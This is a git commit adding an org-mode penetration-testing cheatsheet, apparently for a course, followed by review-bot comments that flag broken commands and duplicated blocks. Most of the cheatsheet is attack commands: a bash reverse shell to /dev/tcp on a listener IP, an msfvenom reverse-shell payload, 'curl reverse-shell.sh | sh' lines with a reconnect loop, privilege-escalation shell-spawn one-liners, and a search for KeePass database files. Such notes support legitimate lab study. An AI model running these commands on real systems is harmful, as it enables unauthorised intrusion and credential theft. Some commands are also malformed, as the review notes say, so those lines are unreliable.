This commit is contained in:
Rh17S15
2025-07-28 09:30:28 +02:00
parent 1d8f631216
commit ad56aad266
2 changed files with 248 additions and 0 deletions


@@ -337,3 +337,6 @@ sudo mysql -e ’! /bin/sh’
strace -o /dev/null /bin/sh strace -o /dev/null /bin/sh
sudo awk ’BEGIN {system(“/bin/sh”)}’ sudo awk ’BEGIN {system(“/bin/sh”)}’
https://nextcloud.th-deg.de/s/ex5yzQ6NtGeKp32
https://github.com/Obedaya/scripts
https://mygit.th-deg.de/lg06087/pentesting
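Review bot: the three URLs appended after the `sudo awk` quick-win land at the very end of the file with no headline or description, so a reader cannot tell which is the course share, which is the scripts repo and which is the pentesting repo; put them under their own org headline (the file already uses `*` headlines) with a one-line label each. The context lines of this hunk also render the existing quick-wins with curly quotes (`’! /bin/sh’`, `“/bin/sh”`); if that is what the file really contains, those commands will not run when pasted, and the straight-quote versions at the end of the new Cheatsheet.org should replace them in a follow-up.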

245
Cheatsheet.org Normal file

@@ -0,0 +1,245 @@
**** to install:
- magic wormhole
- tldr
- rlwrap
-
#+BEGIN_SRC bash
sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap
#+END_SRC
**** for keyring
-> if there is some kind of keyring error
#+BEGIN_SRC bash
sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
#+END_SRC
* information gathering
*** nmap
for quick scan of available ips
#+BEGIN_SRC bash
nmap -sn ip/24
#+END_SRC
to filter output for open ips
#+BEGIN_SRC bash
nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt
#+END_SRC
scan open ports:
#+BEGIN_SRC bash
nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155
#+END_SRC
*** dirb
#+BEGIN_SRC bash
dirb http://ip
#+END_SRC
**** bei windows
#+BEGIN_SRC bash
nmap --vuln ip
#+END_SRC
***** bei windows \+ smb
#+BEGIN_SRC bash
nmap --script smb-vuln* ip
#+END_SRC
* inital access
*** start listener:
#+BEGIN_SRC bash
rlwrap -cAr nc -nlvp 9002
#+END_SRC
*** reverse shell bash:
#+BEGIN_SRC bash
/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1
#+END_SRC
*** reverse shell file:
#+BEGIN_SRC bash
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py
#+END_SRC
-> from revshells.com
*** untested:
Reverse Shell as a Service
1. On your machine:
#+BEGIN_SRC bash
nc -l 1337
or nlvp?
#+END_SRC
2. On the target machine:
#+BEGIN_SRC bash
curl https://reverse-shell.sh/yourip:1337 | sh
#+END_SRC
**** reconnecting:
#+BEGIN_SRC bash
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
#+END_SRC
* privilege escalation
** always run these:
#+BEGIN_SRC bash
sudo -l
#+END_SRC
if sudo doesn't work:
[[*TTY Spawn Shell]]
**** check cronjobs
#+BEGIN_SRC bash
ls /etc/cron.*
crontab -l
#+END_SRC
** TTY Spawn Shell
***** if sudo still doesn't work
use
#+BEGIN_SRC bash
sudo -S command
#+END_SRC
Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
*** Python spawn shell
#+BEGIN_SRC bash
python -c 'import pty; pty.spawn("/bin/bash")'
#+END_SRC
Fully Interactive TTY
**** All the steps to stabilize your shell
**The first step:**
#+BEGIN_SRC bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
#+END_SRC
Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still wont be able to use tab autocomplete or the arrow keys.
**Step two is:**
#+BEGIN_SRC bash
export TERM=xterm
#+END_SRC
This will give us access to term commands such as clear.
**Finally (and most importantly) we will background the shell using**
#+BEGIN_SRC bash
Ctrl + Z
#+END_SRC
Back in our own terminal we use
#+BEGIN_SRC bash
stty raw -echo; fg
#+END_SRC
This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes
#+BEGIN_SRC bash
stty rows 38 columns 116
#+END_SRC
*** OS system spawn shell
#+BEGIN_SRC bash
echo os.system("/bin/bash")
#+END_SRC
*** Bash spawn shell
#+BEGIN_SRC bash
/bin/sh -i
#+END_SRC
*** Perl spawn shell
#+BEGIN_SRC bash
perl —e 'exec "/bin/sh";'
#+END_SRC
*** Ruby spawn shell
ruby: exec "/bin/sh"
*** Lua spawn shell
lua: os.execute("/bin/sh")
*** IRB spawn shell
exec "/bin/sh"
*** VI spawn shell
#+BEGIN_SRC bash
:!bash
#+END_SRC
*** VI(2) spawn shell
#+BEGIN_SRC bash
:set shell=/bin/bash:shell
#+END_SRC
*** Nmap spawn shell
#+BEGIN_SRC bash
!sh
#+END_SRC
**** Exiftools
Metadaten auslesen:
#+BEGIN_SRC bash
exiftool picture.png
#+END_SRC
Binwalk (Binary Daten exportieren):
#+BEGIN_SRC bash
binwalk -e picture.png
#+END_SRC
* Windows
*** WinPEAS
https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS
*** LOLBAS
https://lolbas-project.github.io/#
*** WADCOMS
https://wadcoms.github.io/
*** PrivescCheck Script as an alternative to WinPEAS
https://github.com/itm4n/PrivescCheck
*** RUN these while the other scripts are working
#+BEGIN_SRC powershell
whoami /priv
whoami /all
schtasks /query
#+END_SRC
*** for finding kbdx Files
https://github.com/ivanmrsulja/keepass2john
#+BEGIN_SRC powershell
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
#+END_SRC
quick Wins Linux:
gdb -nx -ex '!sh' -ex quit
sudo mysql -e '! /bin/sh'
strace -o /dev/null /bin/sh
sudo awk 'BEGIN {system("/bin/sh")}'
evilwinrm
quick Wins Linux:
gdb -nx -ex '!sh' -ex quit
sudo mysql -e '! /bin/sh'
strace -o /dev/null /bin/sh
sudo awk 'BEGIN {system("/bin/sh")}'
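Review bot: the `quick Wins Linux:` block (gdb, mysql, strace, awk) is present twice at the end of the file, the second copy directly after the bare word `evilwinrm`; drop the duplicate and give `evilwinrm` a headline or one-line description like the other Windows tools, and wrap the remaining block in `#+BEGIN_SRC bash` as everywhere else. Several commands will not run as written: `nmap --vuln ip` under `**** bei windows` is not an nmap option, the NSE category form is `nmap --script vuln ip` (consistent with the `--script smb-vuln*` line below it); `perl —e 'exec "/bin/sh";'` has an em-dash instead of `-e`; `echo os.system("/bin/bash")` under "OS system spawn shell" is neither valid shell nor valid Python and should be a `python -c` one-liner like the pty example above it; and the vi entry `:set shell=/bin/bash:shell` runs two ex commands together and should read `:set shell=/bin/bash` followed by `:shell`. The "untested" listener block carries the open question `or nlvp?` inside the `#+BEGIN_SRC` fence; resolve it (the main listener above uses `nc -nlvp`) or move the note out of the source block. `nmap -sCV -A` is redundant since `-A` already enables `-sC` and `-sV`. Structure and typos: the file opens with `**** to install:` before any top-level `*` headline, `* information gathering` jumps straight to `***`, there is an empty list item `-` after `rlwrap`, `* inital access` should be `initial`, `for finding kbdx Files` should match the `.kdbx` extension in the command, and `bei windows \+ smb` has a stray backslash. The exiftool/binwalk section sits under privilege escalation but is metadata extraction and belongs with information gathering.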